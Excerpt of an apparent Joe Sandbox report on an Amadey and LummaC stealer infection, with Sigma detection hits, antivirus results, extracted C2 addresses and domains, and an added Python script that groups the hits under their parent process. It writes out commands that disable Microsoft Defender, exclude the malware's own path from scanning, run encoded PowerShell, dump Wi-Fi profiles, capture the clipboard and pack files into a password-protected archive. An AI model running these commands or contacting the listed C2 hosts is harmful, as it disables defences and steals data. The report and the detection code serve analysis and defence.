Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2164, ProcessName: cmd.exe
                                Source: Process started Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", ProcessId: 7532, ProcessName: cmd.exe
                                Source: Process started Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: Process started Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', ProcessId: 6396, ProcessName: powershell.exe
                                Source: File created Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Source: Process started Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f8645e1e85.exe
                                Source: Process started Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: Process started Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7564, ProcessName: cmd.exe
                                Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ProcessId: 1536, ProcessName: cmd.exe
                                Source: File created Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Source: File created Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                Source: Process started Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: File created Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Source: File created Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7584, TargetFilename: C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline
                                Source: Process started Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7532, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *, ProcessId: 3620, ProcessName: rar.exe
                                Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', ProcessId: 6396, ProcessName: powershell.exe

                                Data Obfuscation

                                Source: Process started Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

                                Stealing of Sensitive Information

                                Source: Process started Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7680, ProcessName: cmd.exe
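Nearly every Sigma match above hangs off one parent, D1UL0FG.exe (PID 6716): Defender tampering through Set-MpPreference and MpCmdRun -RemoveDefinitions, an exclusion for its own path, encoded PowerShell that compiles C# through csc.exe, clipboard capture, a Wi-Fi profile dump and staging into a password-protected RAR archive. Each of these is a low-fidelity signal on its own; the value is in correlating them under a common ancestor. The Python below does that over event records constructed from the command lines on this page. It is an added example, not part of the Joe Sandbox report or of the Sigma rules the report cites. The rule names, regular expressions and threshold are this example's own, not the upstream Sigma logic; the PIDs for csc.exe and the benign control process are placeholders; the parent of PowerShell PID 7584 is assumed because the report does not state it; and the encoded payload, which the page does not reproduce, is written as a placeholder.

```python
"""Correlate the low-fidelity process signals from this report's Sigma section
under their common ancestor.  Added example; it is not part of the Joe Sandbox
report or of the Sigma rules the report cites.  Events are constructed from
the command lines shown on the page."""
import re
from collections import defaultdict, namedtuple

Proc = namedtuple("Proc", "pid ppid image cmd")

# Assumed, not stated on the page: the parent of PowerShell 7584, PIDs 9001
# (csc.exe) and 4000 (benign control), and the <redacted> encoded payload.
EVENTS = [
    Proc(6716, 0, r"C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe",
         r'"C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"'),
    Proc(2164, 6716, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference '
         r'-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true '
         r'-DisableRealtimeMonitoring $true -DisableScriptScanning $true '
         r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
         r'-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && '
         r'powershell Set-MpPreference -SubmitSamplesConsent 2 & '
         r'"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'),
    Proc(7532, 6716, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602'
         r'\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"'),
    Proc(3620, 7532, r"C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe",
         r'C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" '
         r'"C:\Users\user\AppData\Local\Temp\vLqBW.zip" *'),
    Proc(1536, 6716, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference '
         r"-ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'" + '"'),
    Proc(6396, 1536, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell -Command Add-MpPreference -ExclusionPath "
         r"'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"),
    Proc(7564, 6716, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"'),
    Proc(7680, 6716, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'),
    Proc(7584, 6716, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <redacted>"),
    Proc(9001, 7584, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
         r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig '
         r'/fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"'),
    Proc(4000, 0, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -NoProfile -Command Get-Date"),
]


def _cmd(pattern):
    """Rule over the process's own command line (case-insensitive)."""
    rx = re.compile(pattern, re.I)
    return lambda p, parent: rx.search(p.cmd) is not None


# Patterns are this example's own, derived from the report, not Sigma's logic.
RULES = {
    "defender_disable": _cmd(r"Set-MpPreference\b.*-Disable\w+\s+\$true"),
    "defender_remove_definitions": _cmd(r"MpCmdRun\.exe.*-RemoveDefinitions"),
    "defender_exclusion": _cmd(r"Add-MpPreference\b.*-ExclusionPath"),
    "encoded_powershell_bypass": _cmd(r"-ExecutionPolicy\s+Bypass\b.*-EncodedCommand"),
    "rar_password_archive": _cmd(r"\brar\.exe\s+a\b.*\s-hp"),
    "wifi_profile_dump": _cmd(r"netsh\s+wlan\s+show\s+profile"),
    "clipboard_capture": _cmd(r"\bGet-Clipboard\b"),
    # Parent/child rule: csc.exe compiling C# on behalf of PowerShell.
    "csc_spawned_by_powershell": lambda p, parent: (
        p.image.lower().endswith("\\csc.exe") and parent is not None
        and parent.image.lower().endswith("\\powershell.exe")),
}


def root_of(pid, by_pid):
    """Walk ppid links up to the topmost process present in this event set."""
    seen = set()
    while pid not in seen and by_pid[pid].ppid in by_pid:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def correlate(events):
    """Map each root ancestor to the sorted list of distinct rules hit beneath it."""
    by_pid = {p.pid: p for p in events}
    hits = defaultdict(set)
    for p in events:
        parent = by_pid.get(p.ppid)
        for name, rule in RULES.items():
            if rule(p, parent):
                hits[root_of(p.pid, by_pid)].add(name)
    return {pid: sorted(names) for pid, names in hits.items()}


def triage(events, threshold=3):
    """Roots with at least `threshold` distinct signals, as (pid, image, signals)."""
    by_pid = {p.pid: p for p in events}
    return [(pid, by_pid[pid].image, names)
            for pid, names in sorted(correlate(events).items())
            if len(names) >= threshold]


if __name__ == "__main__":
    for pid, image, names in triage(EVENTS):
        print(f"{pid} {image}: {len(names)} signals -> {', '.join(names)}")
```

Run against the constructed events, the eight signals all roll up to PID 6716 while the control PowerShell process produces nothing, which is the point: an alert on the ancestor with a count of distinct techniques is far harder to tune away than eight separate cmd.exe alerts. The parent/child rule shows why `ParentImage` matters; csc.exe on its own is ordinary on a developer host.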
                                No Suricata rule has matched


                                AV Detection

                                Source: file.exe Avira: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe Avira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe Avira: detection malicious, Label: HEUR/AGEN.1320706
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exe Avira: detection malicious, Label: HEUR/AGEN.1306040
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe Avira: detection malicious, Label: HEUR/AGEN.1306040
                                Source: 00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                Source: 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "immureprech.biz", "bellflamre.click", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "effecterectz.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}
                                Source: C:\Users\Public\Netstat\FuturreApp.exe ReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Netstat\remcmdstub.exe ReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exe ReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 80%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe ReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe ReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe ReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe ReversingLabs: Detection: 18%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe ReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exe ReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe ReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe ReversingLabs: Detection: 52%
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe ReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe ReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe ReversingLabs: Detection: 66%
                                Source: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe ReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe ReversingLabs: Detection: 87%
                                Source: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe ReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe ReversingLabs: Detection: 18%
                                Source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe ReversingLabs: Detection: 54%
                                Source: C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exe ReversingLabs: Detection: 80%
                                Source: C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exe ReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exe ReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exe ReversingLabs: Detection: 54%
                                Source: file.exe ReversingLabs: Detection: 47%
                                Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe Joe Sandbox ML: detected
                                Source: file.exe Joe Sandbox ML: detected
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: sordid-snaked.cyou
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: awake-weaves.cyou
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: wrathful-jammy.cyou
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: debonairnukk.xyz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: diffuculttan.xyz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: effecterectz.xyz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: deafeninggeh.biz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: immureprech.biz
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: bellflamre.click
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
                                Source: 00000054.00000002.3042976212.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: LPnhqo--nbgnxdlxdnyo
                                Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe File opened: C:\Users\Public\Netstat\msvcr100.dll
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: m9sfEU9.exe, 00000051.00000000.2623878059.0000000000160000.00000002.00000001.01000000.0000001F.sdmp, m9sfEU9.exe, 00000051.00000002.2648520740.0000000000160000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: FuturreApp.exe, 00000055.00000002.7290420572.000000006C002000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: D1UL0FG.exe, 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: D1UL0FG.exe
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
